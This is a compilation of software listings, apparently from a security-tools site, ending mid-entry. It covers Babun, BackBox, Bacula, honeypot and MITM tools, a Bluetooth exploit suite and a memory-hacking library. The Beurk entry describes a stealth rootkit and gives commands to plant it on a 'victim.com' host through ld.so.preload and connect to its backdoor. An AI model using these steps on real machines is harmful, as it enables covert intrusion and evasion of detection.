  • pact - advanced package manager (like apt-get or yum)
  • xTerm-256 compatible console
  • HTTP(s) proxying support
  • Plugin-oriented architecture
  • Pre-configured git and shell
  • Integrated oh-my-zsh
  • Auto update feature
  • "Open Babun Here" context menu entry

Features in 3 minutes

Cygwin

The core of Babun consists of a pre-configured Cygwin. Cygwin is a great tool, but there’s a lot of quirks and tricks that makes you lose a lot of time to make it actually usable. Not only does babun solve most of these problems, but also contains a lot of vital packages, so that you can be productive from the very first minute.

Package manager

Babun provides a package manager called pact. It is similar to apt-get or yum. Pact enables installing/searching/upgrading and deinstalling cygwin packages with no hassle at all. Just invoke pact --help to check how to use it.

Shell

Babun’s shell is tweaked in order to provide the best possible user-experience. There are two shell types that are pre-configured and available right away - bash and zsh (zsh is the default one). Babun’s shell features:
  • syntax highlighting
  • UNIX tools
  • software development tools
  • git-aware prompt
  • custom scripts and aliases
  • and much more!

Console

Mintty is the console used in babun. It features an xterm-256 mode, nice fonts and simply looks great!

Proxying

Babun supports HTTP proxying out of the box. Just add the address and the credentials of your HTTP proxy server to the .babunrc file located in your home folder and execute source .babunrc to enable HTTP proxying. SOCKS proxies are not supported for now.

Developer tools

Babun provides many packages, convenience tools and scripts that make your life much easier. The long list of features includes:
  • programming languages (Python, Perl, etc.)
  • git (with a wide variety of aliases and tweaks)
  • UNIX tools (grep, wget, curl, etc.)
  • vcs (svn, git)
  • oh-my-zsh
  • custom scripts (pbcopy, pbpaste, babun, etc.)

Plugin architecture

Babun has a very small microkernel (cygwin, a couple of bash scripts and a bit of a convention) and a plugin architecture on the top of it. It means that almost everything is a plugin in the babun’s world! Not only does it structure babun in a clean way, but also enables others to contribute small chunks of code. Currently, babun comprises the following plugins:
  • cacert
  • core
  • git
  • oh-my-zsh
  • pact
  • cygdrive
  • dist
  • shell

Auto-update

Self-update is at the very heart of babun! Many Cygwin tools are simple bash scripts - once you install them there is no chance of getting the newer version in a smooth way. You either delete the older version or overwrite it with the newest one losing all the changes you have made in between.
Babun contains an auto-update feature which enables updating both the microkernel, the plugins and even the underlying cygwin. Files located in your home folder will never be deleted nor overwritten which preserves your local config and customizations.

Installer

Babun features an silent command-line installation script that may be executed without admin rights on any Windows hosts.

Using babun

Setting up proxy

To setup proxy uncomment following lines in the .babunrc file (%USER_HOME%\.babun\cygwin\home\USER\.babunrc)
# Uncomment this lines to set up your proxy
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost

Setting up git

Babun has a pre-configured git. The only thing you should do after the installation is to add your name and email to the git config:
git config --global user.name "your name"
git config --global user.email "your@email.com"
There’s a lot of great git aliases provided by the git plugin:
gitalias['alias.cp']='cherry-pick'
gitalias['alias.st']='status -sb'
gitalias['alias.cl']='clone'
gitalias['alias.ci']='commit'
gitalias['alias.co']='checkout'
gitalias['alias.br']='branch'
gitalias['alias.dc']='diff --cached'
gitalias['alias.lg']="log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %Cblue<%an>%Creset' --abbrev-commit --date=relative --all"
gitalias['alias.last']='log -1 --stat'
gitalias['alias.unstage']='reset HEAD --'

Installing and removing packages

Babun is shipped with pact - a Linux like package manager. It uses the cygwin repository for downloading packages:
{ ~ } » pact install arj                                                                     ~
Working directory is /setup
Mirror is http://mirrors.kernel.org/sourceware/cygwin/
setup.ini taken from the cache

Installing arj
Found package arj
--2014-03-30 19:34:38--  http://mirrors.kernel.org/sourceware/cygwin//x86/release/arj/arj-3.10.22-1.tar.bz2
Resolving mirrors.kernel.org (mirrors.kernel.org)... 149.20.20.135, 149.20.4.71, 2001:4f8:1:10:0:1994:3:14, ...
Connecting to mirrors.kernel.org (mirrors.kernel.org)|149.20.20.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 189944 (185K) [application/x-bzip2]
Saving to: `arj-3.10.22-1.tar.bz2'

100%[=======================================>] 189,944      193K/s   in 1.0s

2014-03-30 19:34:39 (193 KB/s) - `arj-3.10.22-1.tar.bz2' saved [189944/189944]

Unpacking...
Package arj installed
Here’s the list of all pact’s features:
{ ~ }  » pact --help
pact: Installs and removes Cygwin packages.

Usage:
  "pact install <package names>" to install given packages
  "pact remove <package names>" to remove given packages
  "pact update <package names>" to update given packages
  "pact show" to show installed packages
  "pact find <patterns>" to find packages matching patterns
  "pact describe <patterns>" to describe packages matching patterns
  "pact packageof <commands or files>" to locate parent packages
  "pact invalidate" to invalidate pact caches (setup.ini, etc.)
Options:
  --mirror, -m <url> : set mirror
  --invalidate, -i       : invalidates pact caches (setup.ini, etc.)
  --force, -f : force the execution
  --help
  --version

Changing the default shell

The zsh (with .oh-my-zsh) is the default babun’s shell.
Executing the following command will output your default shell:
{ ~ } » babun shell                                                                          ~
/bin/zsh
In order to change your default shell execute:
{ ~ } » babun shell /bin/bash                                                                ~
/bin/zsh
/bin/bash
The output contains two lines: the previous default shell and the new default shell

Checking the configuration

Execute the following command the check the configuration:
{ ~ }  » babun check                                                                         ~
Executing babun check
Prompt speed      [OK]
Connection check  [OK]
Update check      [OK]
Cygwin check      [OK]
By executing this command you can also check whether there is a newer cygwin version available:
{ ~ }  » babun check                                                                            ~
Executing babun check
Prompt speed      [OK]
Connection check  [OK]
Update check      [OK]
Cygwin check      [OUTDATED]
Hint: the underlying Cygwin kernel is outdated. Execute 'babun update' and follow the instructions!
It will check if there are problems with the speed of the git prompt, if there’s access to the Internet or finally if you are running the newest version of babun.
The command will output hints if problems occur:
{ ~ } » babun check                                                                          ~
Executing babun check
Prompt speed      [SLOW]
Hint: your prompt is very slow. Check the installed 'BLODA' software.
Connection check  [OK]
Update check      [OK]
Cygwin check      [OK]
On each startup, but only every 24 hours, babun will execute this check automatically. You can disable the automatic check in the ~/.babunrc file.

Tweaking the configuration

You can tweak some config options in the ~/.babunrc file. Here’s the full list of variables that may be modified:
# JVM options
export JAVA_OPTS="-Xms128m -Xmx256m"

# Modify these lines to set your locale
export LANG="en_US.UTF-8"
export LC_CTYPE="en_US.UTF-8"
export LC_ALL="en_US.UTF-8"

# Uncomment these lines to the set your machine's default locale (and comment out the UTF-8 ones)
# export LANG=$(locale -uU)
# export LC_CTYPE=$(locale -uU)
# export LC_ALL=$(locale -uU)

# Uncomment this to disable daily auto-update & proxy checks on startup (not recommended!)
# export DISABLE_CHECK_ON_STARTUP="true"

# Uncomment to increase/decrease the check connection timeout
# export CHECK_TIMEOUT_IN_SECS=4

# Uncomment this lines to set up your proxy
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost

Updating babun

To update babun to the newest version execute:
babun update
Please note that your local configuration files will not be overwritten.
The babun update command will also update the underlying cygwin version if never version is available. In such case babun will download the new cygwin installer, close itself and start the cygwin installation process. Once cygwin installation is completed babun will restart.

Screenshots

Startup screen


Pact - package installation


Pact - package installed


Babun oh-my-zsh - auto-update


VIM syntax highlighting


Nano syntax highlighting


Git aliases - git lg


Git aliases - git st


Shell prompt


Babun update


Open Babun here - Context Menu




Download Babun

BackBox Linux 4.2 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment


BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools.

The BackBox Team is pleased to announce the updated release of BackBox Linux, the version 4.2! This release includes features such as Linux Kernel 3.16 and Ruby 2.1.

What's new
  • Preinstalled Linux Kernel 3.16
  • New Ubuntu 14.04.2 base
  • Ruby 2.1
  • Installer with LVM and Full Disk Encryption options
  • Handy Thunar custom actions
  • RAM wipe at shutdown/reboot
  • System improvements
  • Upstream components
  • Bug corrections
  • Performance boost
  • Improved Anonymous mode
  • Predisposition to ARM architecture (armhf Debian packages)
  • Predisposition to BackBox Cloud platform
  • New and updated hacking tools: beef-project, crunch, fang, galleta, jd-gui, metasploit-framework, pasco, pyew, rifiuti2, setoolkit, theharvester, tor, torsocks, volatility, weevely, whatweb, wpscan, xmount, yara, zaproxy
System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 6 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port (2 GB)

Download BackBox Linux 4.2

BackBox Linux 4.3 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment


BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools.

What's new
  • Preinstalled Linux Kernel 3.16
  • New Ubuntu 14.04.2 base
  • Ruby 2.1
  • Installer with LVM and Full Disk Encryption options
  • Handy Thunar custom actions
  • RAM wipe at shutdown/reboot
  • System improvements
  • Upstream components
  • Bug corrections
  • Performance boost
  • Improved Anonymous mode
  • Predisposition to ARM architecture (armhf Debian packages)
  • Predisposition to BackBox Cloud platform
  • New and updated hacking tools: beef-project, btscanner, dirs3arch, metasploit-framework, ophcrack, setoolkit, tor, weevely, wpscan, etc.

System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 6 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port (2 GB)

Upgrade instructions
To upgrade from a previous version (BackBox 4.x) follow these instructions:
sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f
sudo apt-get install linux-image-generic-lts-utopic linux-headers-generic-lts-utopic linux-signed-image-generic-lts-utopic
sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backbox-desktop backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstall
sudo apt-get autoremove --purge


Download BackBox Linux 4.3

BackBox Linux 4.4 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment


BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools.

The release have some special new features included to keep BackBox up to date with last developments in security world. Tools such as OpenVAS and Automotive Analysis will make a big difference. BackBox 4.4 comes also with Kernel 3.19.

What's new
  • Preinstalled Linux Kernel 3.19
  • New Ubuntu 14.04.3 base
  • Ruby 2.1
  • Installer with LVM and Full Disk Encryption options
  • Handy Thunar custom actions
  • RAM wipe at shutdown/reboot
  • System improvements
  • Upstream components
  • Bug corrections
  • Performance boost
  • Improved Anonymous mode
  • Automotive Analysis category
  • Predisposition to ARM architecture (armhf Debian packages)
  • Predisposition to BackBox Cloud platform
  • New and updated hacking tools: apktool, armitage, beef-project, can-utils, dex2jar, fimap, jd-gui, metasploit-framework, openvas, setoolkit, sqlmap, tor, weevely, wpscan, zaproxy, etc.

System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 6 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port (2 GB)

Upgrade instructions
To upgrade from a previous version (BackBox 4.x) follow these instructions:
sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f
sudo apt-get install linux-image-generic-lts-vivid linux-headers-generic-lts-vivid linux-signed-image-generic-lts-vivid
sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backbox-desktop backbox-menu backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstallsudo apt-get autoremove --purge
sudo apt-get install openvas sqlite3
sudo openvas-launch sync
sudo openvas-launch start


Download BackBox Linux 4.4

Bacula - Network Backup Tool for Linux, Unix, Mac, and Windows


Bacula is a set of computer programs that permits the system administrator to manage backup, recovery, and verification of computer data across a network of computers of different kinds. Bacula can also run entirely upon a single computer and can backup to various types of media, including tape and disk.

In technical terms, it is a network Client/Server based backup program. Bacula is relatively easy to use and efficient, while offering many advanced storage management features that make it easy to find and recover lost or damaged files. Due to its modular design, Bacula is scalable from small single computer systems to systems consisting of hundreds of computers located over a large network.

Who Needs Bacula?

If you are currently using a program such as tar, dump, or bru to backup your computer data, and you would like a network solution, more flexibility, or catalog services, Bacula will most likely provide the additional features you want. However, if you are new to Unix systems or do not have offsetting experience with a sophisticated backup package, the Bacula project does not recommend using Bacula as it is much more difficult to setup and use than tar or dump.

If you want Bacula to behave like the above mentioned simple programs and write over any tape that you put in the drive, then you will find working with Bacula difficult. Bacula is designed to protect your data following the rules you specify, and this means reusing a tape only as the last resort. It is possible to “force” Bacula to write over any tape in the drive, but it is easier and more efficient to use a simpler program for that kind of operation.

If you would like a backup program that can write to multiple volumes (i.e. is not limited by your tape drive capacity), Bacula can most likely fill your needs. In addition, quite a number of Bacula users report that Bacula is simpler to setup and use than other equivalent programs.

If you are currently using a sophisticated commercial package such as Legato Networker. ARCserveIT, Arkeia, or PerfectBackup+, you may be interested in Bacula, which provides many of the same features and is free software available under the GNU Version 2 software license.

Bacula Components or Services

Bacula is made up of the following five major components or services: Director, Console, File, Storage, and Monitor services.

Bacula Director

The Bacula Director service is the program that supervises all the backup, restore, verify and archive operations. The system administrator uses the Bacula Director to schedule backups and to recover files. For more details see the Director Services Daemon Design Document in the Bacula Developer’s Guide. The Director runs as a daemon (or service) in the background.

Bacula Console

The Bacula Console service is the program that allows the administrator or user to communicate with the Bacula Director Currently, the Bacula Console is available in three versions: text-based console interface, QT-based interface, and a wxWidgets graphical interface. The first and simplest is to run the Console program in a shell window (i.e. TTY interface). Most system administrators will find this completely adequate. The second version is a GNOME GUI interface that is far from complete, but quite functional as it has most the capabilities of the shell Console. The third version is a wxWidgets GUI with an interactive file restore. It also has most of the capabilities of the shell console, allows command completion with tabulation, and gives you instant help about the command you are typing. For more details see the Bacula Console Design Document_ConsoleChapter.

Bacula File

The Bacula File service (also known as the Client program) is the software program that is installed on the machine to be backed up. It is specific to the operating system on which it runs and is responsible for providing the file attributes and data when requested by the Director. The File services are also responsible for the file system dependent part of restoring the file attributes and data during a recovery operation. For more details see the File Services Daemon Design Document in the Bacula Developer’s Guide. This program runs as a daemon on the machine to be backed up. In addition to Unix/Linux File daemons, there is a Windows File daemon (normally distributed in binary format). The Windows File daemon runs on current Windows versions (NT, 2000, XP, 2003, and possibly Me and 98).

Bacula Storage

The Bacula Storage services consist of the software programs that perform the storage and recovery of the file attributes and data to the physical backup media or volumes. In other words, the Storage daemon is responsible for reading and writing your tapes (or other storage media, e.g. files). For more details see the Storage Services Daemon Design Document in the Bacula Developer’s Guide. The Storage services runs as a daemon on the machine that has the backup device (usually a tape drive).

Catalog

The Catalog services are comprised of the software programs responsible for maintaining the file indexes and volume databases for all files backed up. The Catalog services permit the system administrator or user to quickly locate and restore any desired file. The Catalog services sets Bacula apart from simple backup programs like tar and bru, because the catalog maintains a record of all Volumes used, all Jobs run, and all Files saved, permitting efficient restoration and Volume management. Bacula currently supports three different databases, MySQL, PostgreSQL, and SQLite, one of which must be chosen when building Bacula.
The three SQL databases currently supported (MySQL, PostgreSQL or SQLite) provide quite a number of features, including rapid indexing, arbitrary queries, and security. Although the Bacula project plans to support other major SQL databases, the current Bacula implementation interfaces only to MySQL, PostgreSQL and SQLite. For the technical and porting details see the Catalog Services Design Document in the developer’s documented.
The packages for MySQL and PostgreSQL are available for several operating systems. Alternatively, installing from the source is quite easy, see the Installing and Configuring MySQLMySqlChapter chapter of this document for the details. For more information on MySQL, please see: www.mysql.comhttp://www.mysql.com. Or see the Installing and Configuring PostgreSQLPostgreSqlChapter chapter of this document for the details. For more information on PostgreSQL, please see: www.postgresql.orghttp://www.postgresql.org.
Configuring and building SQLite is even easier. For the details of configuring SQLite, please see the Installing and Configuring SQLiteSqlLiteChapter chapter of this document.

Bacula Monitor

A Bacula Monitor service is the program that allows the administrator or user to watch current status of Bacula Directors, Bacula File Daemons and Bacula Storage Daemons. Currently, only a GTK+ version is available, which works with GNOME, KDE, or any window manager that supports the FreeDesktop.org system tray standard.
To perform a successful save or restore, the following four daemons must be configured and running: the Director daemon, the File daemon, the Storage daemon, and the Catalog service (MySQL, PostgreSQL or SQLite).


Download Bacula

Beeswarm - Active IDS made easy


Beeswarm is an active IDS project that provides easy configuration, deployment and management of honeypots and clients. The system operates by luring the hacker into the honeypots by setting up a deception infrastructure where deployed drones communicate with honeypots and intentionally leak credentials while doing so. The project has been release in a beta version, a stable version is expected within three months.

Installing and starting the server

On the VM to be set up as the server, perform the following steps. Make sure to write down the administrative password.

$ sudo apt-get install libffi-dev build-essential python-dev python-pip libssl-dev libxml2-dev libxslt1-dev
$ pip install pydes --allow-external pydes --allow-unverified pydes
$ pip install beeswarm
Downloading/unpacking beeswarm
...
Successfully installed Beeswarm
Cleaning up...
$ mkdir server_workdir
$ cd server-workdir/
$ beeswarm --server
...
****************************************************************************
Default password for the admin account is: uqbrlsabeqpbwy
****************************************************************************
...


Download Beeswarm

BetterCap - A complete, modular, portable and easily extensible MITM framework


BetterCap is an attempt to create a complete, modular, portable and easily extensible MITM framework with every kind of features could be needed while performing a man in the middle attack.
It's currently able to sniff and print from the network the following informations:
  • URLs being visited.
  • HTTPS host being visited.
  • HTTP POSTed data.
  • FTP credentials.
  • IRC credentials.
  • POP, IMAP and SMTP credentials.
  • NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.

DEPENDS
  • colorize (gem install colorize)
  • packetfu (gem install packetfu)
  • pcaprub (gem install pcaprub) [sudo apt-get install ruby-dev libpcap-dev]

Beurk - Experimental Unix Rootkit

BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.
NOTE: BEURK is a recursive acronym for EURK xperimental nix oot it

Features
  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp )
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features
  • ptrace(2) hooking for anti-debugging
  • libpcap hooking undermines local sniffers
  • PAM backdoor for local privilege escalation

Usage
  • Compile
    git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    make
  • Install
    scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
  • Enjoy !
    ./client.py victim_ip:port # connect with furtive backdoor

Dependencies
The following packages are not required in order to build BEURK at the moment:
  • libpcap - to avoid local sniffing
  • libpam - for local PAM backdoor
  • libssl - for encrypted backdoor connection
Example on debian:
    apt-get install libpcap-dev libpam-dev libssl-dev


Download Beurk

BlackArch Linux v2015.07.31 - Penetration Testing Distribution


BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1239 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

The new ISOs include over 1230 tools for i686 and x86_64 and over 1010 tools. For more details see the ChangeLog below.                             

Changelog v2015.07.31
  • added more than 30 new tools
  • updated system packages including linux kernel 4.1.3
  • updated all tools
  • added new color config for vim
  • replace splash.png
  • deleted blackarch-install.txt
  • updated /root/README
  • fixed typos in ISO config files


BlackArch Linux v2015.11.24 - Penetration Testing Distribution


BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1308 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

The BlackArch Live ISO contains multiple window managers.

ChangeLog v2015.11.24:
  • added more than 100 new tools
  • updated system packages
  • include linux kernel 4.2.5
  • updated all tools
  • updated menu entries for window managers
  • added (correct) multilib support
  • added more fonts
  • added missing group 'vboxsf'

Download BlackArch Linux v2015.11.24

Blackbone - Windows Memory Hacking Library

Blackbone, Windows Memory Hacking Library

Features
  • x86 and x64 support
  • Process interaction
    • Manage PEB32/PEB64
    • Manage process through WOW64 barrier
  • Process Memory
    • Allocate and free virtual memory
    • Change memory protection
    • Read/Write virtual memory
  • Process modules
    • Enumerate all (32/64 bit) modules loaded. Enumerate modules using Loader list/Section objects/PE headers methods.
    • Get exported function address
    • Get the main module
    • Unlink module from loader lists
    • Inject and eject modules (including pure IL images)
    • Inject 64bit modules into WOW64 processes
    • Manually map native PE images
  • Threads
    • Enumerate threads
    • Create and terminate threads. Support for cross-session thread creation.
    • Get thread exit code
    • Get main thread
    • Manage TEB32/TEB64
    • Join threads
    • Suspend and resume threads
    • Set/Remove hardware breakpoints
  • Pattern search
    • Search for arbitrary pattern in local or remote process
  • Remote code execution
    • Execute functions in remote process
    • Assemble own code and execute it remotely
    • Support for cdecl/stdcall/thiscall/fastcall conventions
    • Support for arguments passed by value, pointer or reference, including structures
    • FPU types are supported
    • Execute code in new thread or any existing one
  • Remote hooking
    • Hook functions in remote process using int3 or hardware breakpoints
    • Hook functions upon return
  • Manual map features
    • x86 and x64 image support
    • Mapping into any arbitrary unprotected process
    • Section mapping with proper memory protection flags
    • Image relocations (only 2 types supported. I haven't seen a single PE image with some other relocation types)
    • Imports and Delayed imports are resolved
    • Bound import is resolved as a side effect, I think
    • Module exports
    • Loading of forwarded export images
    • Api schema name redirection
    • SxS redirection and isolation
    • Activation context support
    • Dll path resolving similar to native load order
    • TLS callbacks. Only for one thread and only with PROCESS_ATTACH/PROCESS_DETACH reasons.
    • Static TLS
    • Exception handling support (SEH and C++)
    • Adding module to some native loader structures(for basic module api support: GetModuleHandle, GetProcAdress, etc.)
    • Security cookie initialization
    • C++/CLI images are supported
    • Image unloading
    • Increase reference counter for import libraries in case of manual import mapping
    • Cyclic dependencies are handled properly
  • Driver features
  • Allocate/free/protect user memory
  • Read/write user and kernel memory
  • Disable permanent DEP for WOW64 processes
  • Change process protection flag
  • Change handle access rights
  • Remap process memory
  • Hiding allocated user-mode memory
  • User-mode dll injection and manual mapping
  • Manual mapping of drivers

Download Blackbone

BlueMaho - Bluetooth Security Testing Suite


BlueMaho is GUI-shell (interface) for suite of tools for testing security of bluetooth devices. It is freeware, opensource, written on python, uses wxPyhon. It can be used for testing BT-devices for known vulnerabilities and major thing to do - testing to find unknown vulns. Also it can form nice statistics.

What it can do? (features)
  • scan for devices, show advanced info, SDP records, vendor etc
  • track devices - show where and how much times device was seen, its name changes
  • loop scan - it can scan all time, showing you online devices
  • alerts with sound if new device found
  • on_new_device - you can spacify what command should it run when it founds new device
  • it can use separate dongles - one for scaning (loop scan) and one for running tools or exploits
  • send files
  • change name, class, mode, BD_ADDR of local HCI devices
  • save results in database
  • form nice statistics (uniq devices by day/hour, vendors, services etc)
  • test remote device for known vulnerabilities (see exploits for more details)
  • test remote device for unknown vulnerabilities (see tools for more details)
  • themes! you can customize it

What tools and exploits it consist of?
  • Tools:
  • atshell.c by Bastian Ballmann (modified attest.c by Marcel Holtmann)
  • bccmd by Marcel Holtmann
  • bdaddr.c by Marcel Holtmann
  • bluetracker.py by smiley
  • carwhisperer v0.2 by Martin Herfurt
  • psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin R. Mulliner
  • BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
  • btftp v0.1 by Marcel Holtmann
  • btobex v0.1 by Marcel Holtmann
  • greenplaque v1.5 by digitalmunition.com
  • L2CAP packetgenerator by Bastian Ballmann
  • obex stress tests 0.1
  • redfang v2.50 by Ollie Whitehouse
  • ussp-push v0.10 by Davide Libenzi
  • exploits/attacks:
  • Bluebugger v0.1 by Martin J. Muench
  • bluePIMp by Kevin Finisterre
  • BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
  • helomoto by Adam Laurie
  • hidattack v0.1 by Collin R. Mulliner
  • Mode 3 abuse attack
  • Nokia N70 l2cap packet DoS PoC Pierre Betouin
  • opush abuse (prompts flood) DoS attack
  • Sony-Ericsson reset display PoC by Pierre Betouin
  • you can add your own tools by editing 'exploits/exploits.lst' and 'tools/tools.lst'

Requirements
  • OS (tested with Debian 4.0 Etch / 2.6.18)
  • python (python 2.4 http://www.python.org)
  • wxPython (python-wxgtk2.6 http://www.wxpython.org)
  • BlueZ (3.9/3.24) http://www.bluez.org
  • Eterm to open tools somewhere, you can set another term in 'config/defaul.conf' changing the value of 'cmd_term' variable. (tested with 1.1 ver)
  • pkg-config(0.21), 'tee' used in tools/showmaxlocaldevinfo.sh, openobex, obexftp
  • libopenobex1 + libopenobex-dev (needed by ussp-push)
  • libxml2, libxml2-dev (needed by btftp)
  • libusb-dev (needed by bccmd)
  • libreadline5-dev (needed by atshell.c)
  • lightblue-0.3.3 (needed by obexstress.py)
  • hardware: any bluez compatible bluetooth-device 

BlueScreenView - Blue Screen of Death (STOP error) information in dump files


BlueScreenView scans all your minidump files created during 'blue screen of death' crashes, and displays the information about all crashes in one table. For each crash, BlueScreenView displays the minidump filename, the date/time of the crash, the basic crash information displayed in the blue screen (Bug Check Code and 4 parameters), and the details of the driver or module that possibly caused the crash (filename, product name, file description, and file version).

For each crash displayed in the upper pane, you can view the details of the device drivers loaded during the crash in the lower pane. BlueScreenView also mark the drivers that their addresses found in the crash stack, so you can easily locate the suspected drivers that possibly caused the crash.

Features
  • Automatically scans your current minidump folder and displays the list of all crash dumps, including crash dump date/time and crash details.
  • Allows you to view a blue screen which is very similar to the one that Windows displayed during the crash.
  • BlueScreenView enumerates the memory addresses inside the stack of the crash, and find all drivers/modules that might be involved in the crash.
  • BlueScreenView also allows you to work with another instance of Windows, simply by choosing the right minidump folder (In Advanced Options).
  • BlueScreenView automatically locate the drivers appeared in the crash dump, and extract their version resource information, including product name, file version, company, and file description. 

Using BlueScreenView

BlueScreenView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - BlueScreenView.exe 

After running BlueScreenView, it automatically scans your MiniDump folder and display all crash details in the upper pane.

Crashes Information Columns (Upper Pane)
  • Dump File: The MiniDump filename that stores the crash data.
  • Crash Time: The created time of the MiniDump filename, which also matches to the date/time that the crash occurred.
  • Bug Check String: The crash error string. This error string is determined according to the Bug Check Code, and it's also displayed in the blue screen window of Windows.
  • Bug Check Code: The bug check code, as displayed in the blue screen window.
  • Parameter 1/2/3/4: The 4 crash parameters that are also displayed in the blue screen of death.
  • Caused By Driver: The driver that probably caused this crash. BlueScreenView tries to locate the right driver or module that caused the blue screen by looking inside the crash stack. However, be aware that the driver detection mechanism is not 100% accurate, and you should also look in the lower pane, that display all drivers/modules found in the stack. These drivers/modules are marked in pink color.
  • Caused By Address: Similar to 'Caused By Driver' column, but also display the relative address of the crash.
  • File Description: The file description of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
  • Product Name: The product name of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
  • Company: The company name of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
  • File Version: The file version of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
  • Crash Address:The memory address that the crash occurred. (The address in the EIP/RIP processor register) In some crashes, this value might be identical to 'Caused By Address' value, while in others, the crash address is different from the driver that caused the crash.
  • Stack Address 1 - 3: The last 3 addresses found in the call stack. Be aware that in some crashes, these values will be empty. Also, the stack addresses list is currently not supported for 64-bit crashes. 

Drivers Information Columns (Lower Pane)
  • Filename: The driver/module filename
  • Address In Stack: The memory address of this driver that was found in the stack.
  • From Address: First memory address of this driver.
  • To Address: Last memory address of this driver.
  • Size: Driver size in memory.
  • Time Stamp: Time stamp of this driver.
  • Time String: Time stamp of this driver, displayed in date/time format.
  • Product Name: Product name of this driver, loaded from the version resource of the driver.
  • File Description: File description of this driver, loaded from the version resource of the driver.
  • File Version: File version of this driver, loaded from the version resource of the driver.
  • Company: Company name of this driver, loaded from the version resource of the driver.
  • Full Path: Full path of the driver filename.

Lower Pane Modes

Currently, the lower pane has 4 different display modes. You can change the display mode of the lower pane from Options->Lower Pane Mode menu.
  1. All Drivers: Displays all the drivers that were loaded during the crash that you selected in the upper pane. The drivers/module that their memory addresses found in the stack, are marked in pink color.
  2. Only Drivers Found In Stack: Displays only the modules/drivers that their memory addresses found in the stack of the crash. There is very high chance that one of the drivers in this list is the one that caused the crash.
  3. Blue Screen in XP Style: Displays a blue screen that looks very similar to the one that Windows displayed during the crash.
  4. DumpChk Output: Displays the output of Microsoft DumpChk utility. This mode only works when Microsoft DumpChk is installed on your computer and BlueScreenView is configured to run it from the right folder (In the Advanced Options window). 

Command-Line Options

/LoadFrom <Source> Specifies the source to load from.
1 -> Load from a single MiniDump folder (/MiniDumpFolder parameter)
2 -> Load from all computers specified in the computer list file. (/ComputersFile parameter)
3 -> Load from a single MiniDump file (/SingleDumpFile parameter)
/MiniDumpFolder <Folder> Start BlueScreenView with the specified MiniDump folder.
/SingleDumpFile <Filename> Start BlueScreenView with the specified MiniDump file. (For using with /LoadFrom 3)
/ComputersFile <Filename> Specifies the computers list filename. (When LoadFrom = 2)
/LowerPaneMode <1 - 3> Start BlueScreenView with the specified mode. 1 = All Drivers, 2 = Only Drivers Found In Stack, 3 = Blue Screen in XP Style.
/stext <Filename> Save the list of blue screen crashes into a regular text file.
/stab <Filename> Save the list of blue screen crashes into a tab-delimited text file.
/scomma <Filename> Save the list of blue screen crashes into a comma-delimited text file (csv).
/stabular <Filename> Save the list of blue screen crashes into a tabular text file.
/shtml <Filename> Save the list of blue screen crashes into HTML file (Horizontal).
/sverhtml <Filename> Save the list of blue screen crashes into HTML file (Vertical).
/sxml <Filename> Save the list of blue screen crashes into XML file.
/sort <column> This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Bug Check Code" and "Crash Time". You can specify the '~' prefix character (e.g: "~Crash Time") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
